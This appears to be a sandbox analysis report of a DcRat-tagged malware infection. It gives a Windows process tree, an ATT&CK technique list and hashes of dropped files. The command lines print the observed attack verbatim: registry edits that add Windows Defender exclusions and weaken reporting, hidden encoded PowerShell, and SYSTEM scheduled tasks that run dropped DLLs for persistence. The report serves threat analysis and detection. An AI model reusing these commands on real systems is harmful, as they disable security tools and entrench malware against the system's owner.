Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

Process (depth 2): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BpmXCGkSTNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BpmXCGkSTNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KYhAKHECtWIvC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KYhAKHECtWIvC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJGvZSUioXRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJGvZSUioXRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wrndFtifU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wrndFtifU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LIYCBlCeAeRQzmVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LIYCBlCeAeRQzmVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UAGVHuYmYMGQZIzG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UAGVHuYmYMGQZIzG\" /t REG_DWORD /d 0 /reg:64;"
- Drops file in System32 directory
- Modifies data under HKEY_USERS

Process (depth 3): C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BpmXCGkSTNUn" /t REG_DWORD /d 0 /reg:32

Process (depth 4): C:\Windows\SysWOW64\reg.exe
Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BpmXCGkSTNUn" /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BpmXCGkSTNUn" /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR" /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR" /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KYhAKHECtWIvC" /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KYhAKHECtWIvC" /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJGvZSUioXRU2" /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJGvZSUioXRU2" /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wrndFtifU" /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wrndFtifU" /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LIYCBlCeAeRQzmVB /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LIYCBlCeAeRQzmVB /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj /t REG_DWORD /d 0 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UAGVHuYmYMGQZIzG /t REG_DWORD /d 0 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UAGVHuYmYMGQZIzG /t REG_DWORD /d 0 /reg:64

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /CREATE /TN "gjKsgEbjX" /SC once /ST 05:32:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Decoded EncodedCommand (base64 of UTF-16LE): start-process -WindowStyle Hidden gpupdate.exe /force
- DcRat
- Creates scheduled task(s)

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /run /I /tn "gjKsgEbjX"

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /DELETE /F /TN "gjKsgEbjX"

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /CREATE /TN "hEOVRvlnWpJzMGvLw" /SC once /ST 03:34:45 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UAGVHuYmYMGQZIzG\qgXTFBpSSKOwGWB\oaLvSCW.exe\" cs /site_id 525403 /S" /V1 /F
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /run /I /tn "hEOVRvlnWpJzMGvLw"

Process (depth 1): C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
Command line: C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
- Executes dropped EXE

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
- DcRat
- Creates scheduled task(s)

Process (depth 1): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Decoded EncodedCommand (base64 of UTF-16LE): start-process -WindowStyle Hidden gpupdate.exe /force

Process (depth 2): C:\Windows\system32\gpupdate.exe
Command line: "C:\Windows\system32\gpupdate.exe" /force

Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

Process (depth 1): C:\Windows\system32\gpscript.exe
Command line: gpscript.exe /RefreshSystemParam

Process (depth 1): C:\Windows\system32\gpscript.exe
Command line: gpscript.exe /RefreshSystemParam

Process (depth 1): C:\Windows\system32\regsvr32.exe
Command line: regsvr32 /s C:\Users\Admin\AppData\Local\Temp\1781.dll

Process (depth 2): C:\Windows\SysWOW64\regsvr32.exe
Command line: /s C:\Users\Admin\AppData\Local\Temp\1781.dll
- Loads dropped DLL

Process (depth 1): C:\Users\Admin\AppData\Local\Temp\18BA.exe
Command line: C:\Users\Admin\AppData\Local\Temp\18BA.exe
- Suspicious use of SetThreadContext

Process (depth 2): C:\Users\Admin\AppData\Local\Temp\18BA.exe
Command line: C:\Users\Admin\AppData\Local\Temp\18BA.exe
- Checks computer location settings

Process (depth 3): C:\Users\Admin\AppData\Local\Temp\18BA.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\18BA.exe" --Admin IsNotAutoStart IsNotTask
- Suspicious use of SetThreadContext

Process (depth 4): C:\Users\Admin\AppData\Local\Temp\18BA.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\18BA.exe" --Admin IsNotAutoStart IsNotTask
- Checks computer location settings

Process (depth 5): C:\Users\Admin\AppData\Local\668f4dd7-105c-44f1-972d-cb6bf16be478\build2.exe
Command line: "C:\Users\Admin\AppData\Local\668f4dd7-105c-44f1-972d-cb6bf16be478\build2.exe"
- Suspicious use of SetThreadContext

Process (depth 6): C:\Users\Admin\AppData\Local\668f4dd7-105c-44f1-972d-cb6bf16be478\build2.exe
Command line: "C:\Users\Admin\AppData\Local\668f4dd7-105c-44f1-972d-cb6bf16be478\build2.exe"

Process (depth 1): C:\Users\Admin\AppData\Local\Temp\1AAF.exe
Command line: C:\Users\Admin\AppData\Local\Temp\1AAF.exe
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection

Process (depth 1): C:\Users\Admin\AppData\Local\Temp\1C37.exe
Command line: C:\Users\Admin\AppData\Local\Temp\1C37.exe
- Suspicious use of SetThreadContext

Process (depth 2): C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

Process (depth 1): C:\Windows\SysWOW64\explorer.exe
Command line: C:\Windows\SysWOW64\explorer.exe
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path

Process (depth 1): C:\Windows\explorer.exe
Command line: C:\Windows\explorer.exe

Process (depth 1): C:\Windows\Temp\UAGVHuYmYMGQZIzG\qgXTFBpSSKOwGWB\oaLvSCW.exe
Command line: C:\Windows\Temp\UAGVHuYmYMGQZIzG\qgXTFBpSSKOwGWB\oaLvSCW.exe cs /site_id 525403 /S
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /DELETE /F /TN "bfPiLOEoMHGtOUUyTU"

Process (depth 2): C:\Windows\SysWOW64\cmd.exe
Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

Process (depth 2): C:\Windows\SysWOW64\cmd.exe
Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\wrndFtifU\ADiKMh.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "CMIDffFQijmeSZd" /V1 /F
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /CREATE /TN "CMIDffFQijmeSZd2" /F /xml "C:\Program Files (x86)\wrndFtifU\cUXIbIj.xml" /RU "SYSTEM"
- DcRat
- Creates scheduled task(s)

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /END /TN "CMIDffFQijmeSZd"

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /DELETE /F /TN "CMIDffFQijmeSZd"

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /CREATE /TN "FHrhfHAbDMoVgn" /F /xml "C:\Program Files (x86)\sJGvZSUioXRU2\CqqAbtH.xml" /RU "SYSTEM"
- DcRat
- Creates scheduled task(s)

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /CREATE /TN "vGyDUozQLYzyN2" /F /xml "C:\ProgramData\LIYCBlCeAeRQzmVB\ACByebW.xml" /RU "SYSTEM"
- DcRat
- Creates scheduled task(s)

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /CREATE /TN "LqDpKNkcwALTGagBI2" /F /xml "C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\cweDAZY.xml" /RU "SYSTEM"
- DcRat
- Creates scheduled task(s)

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /CREATE /TN "admxdtfLtextKFmXkQj2" /F /xml "C:\Program Files (x86)\KYhAKHECtWIvC\OwrHoLH.xml" /RU "SYSTEM"
- DcRat
- Creates scheduled task(s)

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /CREATE /TN "tzhoEZPqxAOMgijXP" /SC once /ST 04:04:37 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UAGVHuYmYMGQZIzG\bEhnnvWq\ZyvsAmQ.dll\",#1 /site_id 525403" /V1 /F
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /run /I /tn "tzhoEZPqxAOMgijXP"

Process (depth 2): C:\Windows\SysWOW64\cmd.exe
Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

Process (depth 2): C:\Windows\SysWOW64\cmd.exe
Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

Process (depth 2): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /DELETE /F /TN "hEOVRvlnWpJzMGvLw"

Process (depth 1): C:\Users\Admin\AppData\Roaming\gtdcvsc
Command line: C:\Users\Admin\AppData\Roaming\gtdcvsc
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection

Process (depth 1): C:\Users\Admin\AppData\Roaming\itdcvsc
Command line: C:\Users\Admin\AppData\Roaming\itdcvsc

Process (depth 2): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 12732 -s 340
- Program crash

Process (depth 1): C:\Windows\system32\rundll32.EXE
Command line: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UAGVHuYmYMGQZIzG\bEhnnvWq\ZyvsAmQ.dll",#1 /site_id 525403

Process (depth 2): C:\Windows\SysWOW64\rundll32.exe
Command line: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UAGVHuYmYMGQZIzG\bEhnnvWq\ZyvsAmQ.dll",#1 /site_id 525403
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS

Process (depth 3): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /DELETE /F /TN "tzhoEZPqxAOMgijXP"

Process (depth 1): C:\Users\Admin\AppData\Roaming\hudcvsc
Command line: C:\Users\Admin\AppData\Roaming\hudcvsc
- Suspicious use of SetThreadContext

Process (depth 2): C:\Users\Admin\AppData\Roaming\hudcvsc
Command line: C:\Users\Admin\AppData\Roaming\hudcvsc

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 12732 -ip 12732

Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (2)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (4)
- Disabling Security Tools (1)
- Virtualization/Sandbox Evasion (1)
- File Permissions Modification (1)
- Scripting (1)
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oMPcKCByxz6c6aQOVuge8D1R.exe.logFilesize
42B
MD584cfdb4b995b1dbf543b26b86c863adc
SHA1d2f47764908bf30036cf8248b9ff5541e2711fa2
SHA256d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b
SHA512485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce
-
C:\Users\Admin\AppData\Local\Temp\eTcHXU.OjDFilesize
1.4MB
MD541c8c2003f66e414a080e0a989788f2e
SHA120740ccc5f39d07b8b2efd5b320fedc35164de78
SHA2561736f19ac90d0a11ace6b83b997019d3cc6c05c38ed701ecaabe05d652d56639
SHA51230abac99a833603fb9fadf08868791d5e422e92a5e305fe4c96b7b81c63b532ab87a74861bfc23d3779ece609cab72e7966e93a4ce232dbcde4d05a004ddd209
-
C:\Users\Admin\AppData\Local\Temp\eTcHXu.OjDFilesize
1.4MB
MD541c8c2003f66e414a080e0a989788f2e
SHA120740ccc5f39d07b8b2efd5b320fedc35164de78
SHA2561736f19ac90d0a11ace6b83b997019d3cc6c05c38ed701ecaabe05d652d56639
SHA51230abac99a833603fb9fadf08868791d5e422e92a5e305fe4c96b7b81c63b532ab87a74861bfc23d3779ece609cab72e7966e93a4ce232dbcde4d05a004ddd209
-
C:\Users\Admin\AppData\Local\Temp\eTcHXu.OjDFilesize
1.4MB
MD541c8c2003f66e414a080e0a989788f2e
SHA120740ccc5f39d07b8b2efd5b320fedc35164de78
SHA2561736f19ac90d0a11ace6b83b997019d3cc6c05c38ed701ecaabe05d652d56639
SHA51230abac99a833603fb9fadf08868791d5e422e92a5e305fe4c96b7b81c63b532ab87a74861bfc23d3779ece609cab72e7966e93a4ce232dbcde4d05a004ddd209
-
C:\Users\Admin\Pictures\Minor Policy\5XX9Z8GfruEUHkqLJGNcaeDq.exeFilesize
1.7MB
MD5d2e0cb24fce237ce0feba8dbaed2320c
SHA16b9f608f4dc210259f513eda063244d68c6d21e2
SHA2566f001ffcf01b277bd49340fcf6dfaeaa8248bca8e6d9096caf1630e809d6bd17
SHA5121725c49f821aa7c8e64532dcf428c6d550d6624dcce3057c8b1b06a1465caf0b134b4b016dd7ecfb8dba7e9004874568ddbb2871e1ab26fdc01bde3b6d09ceb8
-
C:\Users\Admin\Pictures\Minor Policy\5XX9Z8GfruEUHkqLJGNcaeDq.exeFilesize
1.7MB
MD5d2e0cb24fce237ce0feba8dbaed2320c
SHA16b9f608f4dc210259f513eda063244d68c6d21e2
SHA2566f001ffcf01b277bd49340fcf6dfaeaa8248bca8e6d9096caf1630e809d6bd17
SHA5121725c49f821aa7c8e64532dcf428c6d550d6624dcce3057c8b1b06a1465caf0b134b4b016dd7ecfb8dba7e9004874568ddbb2871e1ab26fdc01bde3b6d09ceb8
-
C:\Users\Admin\Pictures\Minor Policy\5dql7piSRHDDYa_r8buffZkT.exeFilesize
400KB
MD59519c85c644869f182927d93e8e25a33
SHA1eadc9026e041f7013056f80e068ecf95940ea060
SHA256f0dc8fa1a18901ac46f4448e434c3885a456865a3a309840a1c4ac67fd56895b
SHA512dcc1dd25bba19aaf75ec4a1a69dc215eb519e9ee3b8f7b1bd16164b736b3aa81389c076ed4e8a17a1cbfaec2e0b3155df039d1bca3c7186cfeb9950369bccf23
-
C:\Users\Admin\Pictures\Minor Policy\5dql7piSRHDDYa_r8buffZkT.exeFilesize
400KB
MD59519c85c644869f182927d93e8e25a33
SHA1eadc9026e041f7013056f80e068ecf95940ea060
SHA256f0dc8fa1a18901ac46f4448e434c3885a456865a3a309840a1c4ac67fd56895b
SHA512dcc1dd25bba19aaf75ec4a1a69dc215eb519e9ee3b8f7b1bd16164b736b3aa81389c076ed4e8a17a1cbfaec2e0b3155df039d1bca3c7186cfeb9950369bccf23
-
C:\Users\Admin\Pictures\Minor Policy\6nu8WAAz96Ll697FGgrU_0Ep.exeFilesize
258KB
MD541d38523fc8d1c92d163ab98d44df332
SHA11cfedd3c872e579b200b11809e9e655ff3547ef9
SHA25608e913af4a86466aea86203b3a75fe51cf8765fd72c76f8f9a402d42d61c70e2
SHA512a472bd34f416157a064939560df142a173324ff28fdf21a0ac6d42f4c195301147d0d8667d808dbde08619d9b56a44f85b478b8e5ef2f18d333914167823a6bd
-
C:\Users\Admin\Pictures\Minor Policy\6nu8WAAz96Ll697FGgrU_0Ep.exeFilesize
258KB
MD541d38523fc8d1c92d163ab98d44df332
SHA11cfedd3c872e579b200b11809e9e655ff3547ef9
SHA25608e913af4a86466aea86203b3a75fe51cf8765fd72c76f8f9a402d42d61c70e2
SHA512a472bd34f416157a064939560df142a173324ff28fdf21a0ac6d42f4c195301147d0d8667d808dbde08619d9b56a44f85b478b8e5ef2f18d333914167823a6bd
-
C:\Users\Admin\Pictures\Minor Policy\75huro8A6uIQ4Z3yLnBxmNPI.exeFilesize
3.8MB
MD5cd6124575280dd513412db5bd233d32a
SHA1a99cd43c0cf24a8379f74d32ca81067d502b0914
SHA256dfafcfd68e719844dd2b7626752cbf7c818e9de768fee5e5888d94e242baeabf
SHA512e5a1f17913ceecc6a58f6b41b606718594bcaff033e717102f1698992dffb988b82daa2e70b8a1ac335d11b7fcdd85d163f7180a8f614b38b8741a936ee46717
-
C:\Users\Admin\Pictures\Minor Policy\75huro8A6uIQ4Z3yLnBxmNPI.exeFilesize
3.8MB
MD5cd6124575280dd513412db5bd233d32a
SHA1a99cd43c0cf24a8379f74d32ca81067d502b0914
SHA256dfafcfd68e719844dd2b7626752cbf7c818e9de768fee5e5888d94e242baeabf
SHA512e5a1f17913ceecc6a58f6b41b606718594bcaff033e717102f1698992dffb988b82daa2e70b8a1ac335d11b7fcdd85d163f7180a8f614b38b8741a936ee46717
-
C:\Users\Admin\Pictures\Minor Policy\7c54za4xnx_ox5Ogv39y8LB9.exeFilesize
1.3MB
MD52cd610432fb9268ca9b3f225419030cf
SHA1b602f79bb4517f940b50e4fc7308193d7ec1826b
SHA25616d2b813b6fded916d57ad54f8910d560b213847937d5fcb11f3c9be871a10b8
SHA512acf5d19399206737c5a3f4e0a05d4cf89d6a53eb1f9f0ded3889373b8e308bc05272f1d98c8e9aa801a8e8e0f5a9a10713491b210e1143005a898f15cf0a8c22
-
C:\Users\Admin\Pictures\Minor Policy\7c54za4xnx_ox5Ogv39y8LB9.exeFilesize
1.3MB
MD52cd610432fb9268ca9b3f225419030cf
SHA1b602f79bb4517f940b50e4fc7308193d7ec1826b
SHA25616d2b813b6fded916d57ad54f8910d560b213847937d5fcb11f3c9be871a10b8
SHA512acf5d19399206737c5a3f4e0a05d4cf89d6a53eb1f9f0ded3889373b8e308bc05272f1d98c8e9aa801a8e8e0f5a9a10713491b210e1143005a898f15cf0a8c22
-
C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exeFilesize
358KB
MD5c33a73d4a56f74fd979a6f10740a43e8
SHA1ba6d82971be7842c76a62969b5bb96af93dd3545
SHA256dfd29461b16401b73544be8cdc5f594e6eb33e98f33c2809e62163aaf6ae72ec
SHA512a07af6ca9f75f1bb5fb510700a8a64afcbb18c4c60f5c07fd11477a9bbf04a8c78417115b0520e2f2f7b08f6f7c421bca9da7aae5209d3593e0d7b5d1657e618
-
C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exeFilesize
358KB
MD5c33a73d4a56f74fd979a6f10740a43e8
SHA1ba6d82971be7842c76a62969b5bb96af93dd3545
SHA256dfd29461b16401b73544be8cdc5f594e6eb33e98f33c2809e62163aaf6ae72ec
SHA512a07af6ca9f75f1bb5fb510700a8a64afcbb18c4c60f5c07fd11477a9bbf04a8c78417115b0520e2f2f7b08f6f7c421bca9da7aae5209d3593e0d7b5d1657e618
-
C:\Users\Admin\Pictures\Minor Policy\GosxYJzZkoJQOXo9mXaLnZ9Q.exe
Filesize: 1.4MB
MD5: c1f6a8882176d8137329931854837c1e
SHA1: 7237de72fd2554bc8121c552104228517c070b82
SHA256: 904ae917651554780de2a286bf815d6aeaf81b6e865c44616263301b686d5d81
SHA512: 1230b098dcdb18c7514bc47f781412bb3ab17a75756bb77c39409c439099e441b04234726f6682fdaf8bce07f5c74fce943df79384f8a22bd0e565dae203f36c
-
C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exe
Filesize: 72KB
MD5: 338057ba65f786f4238be340d64daf08
SHA1: 6571744dbdf2150179e46fbf4de2ce8ba715cbf2
SHA256: bfb5009ee0d70c0e594a9f35fb56d541b91a9e7ab1f396ba01b986f1567e5bac
SHA512: 37e2a8a12dab1481bcb60fa8afdc9613cbff8e5d873754e3c6142e882d742c0f9ea19f1bac6ce1f6644b3e1c1022a7aab73105f53c2ccf4e9a71405fac89de34
-
C:\Users\Admin\Pictures\Minor Policy\OaITYmj2fsq0x8aMFqNsCs4j.exe
Filesize: 1.3MB
MD5: 42530ea49a760b8df4da6ed41dc8060c
SHA1: b9b4efebee496b6a47541de2b38926e05b260507
SHA256: 4c41b180f87e9fce98f2da11d11ad01b228d900c8130e6d5c59ff1b3e2184f4e
SHA512: b0fc64d9a5ba1e9c92fb5574a39a5cf487fc9fc280017fbe23c19148a85b18a0dd27f7d2c36ca7e488c33ae982a302cccfb475b94e703f4e65953be4e2936f1f
-
